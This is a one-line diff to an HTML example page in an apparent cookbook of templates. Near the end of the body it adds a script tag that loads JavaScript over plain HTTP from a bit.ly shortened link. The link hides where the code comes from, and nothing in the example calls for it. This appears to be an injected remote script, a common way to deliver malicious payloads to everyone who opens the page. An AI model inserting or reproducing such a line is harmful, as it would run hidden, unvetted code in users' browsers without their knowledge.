--- a/cookbook/examples/blog-with-sidebar/index.html
+++ b/cookbook/examples/blog-with-sidebar/index.html
@@ -174,5 +174,6 @@
                 </div>
             </div>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
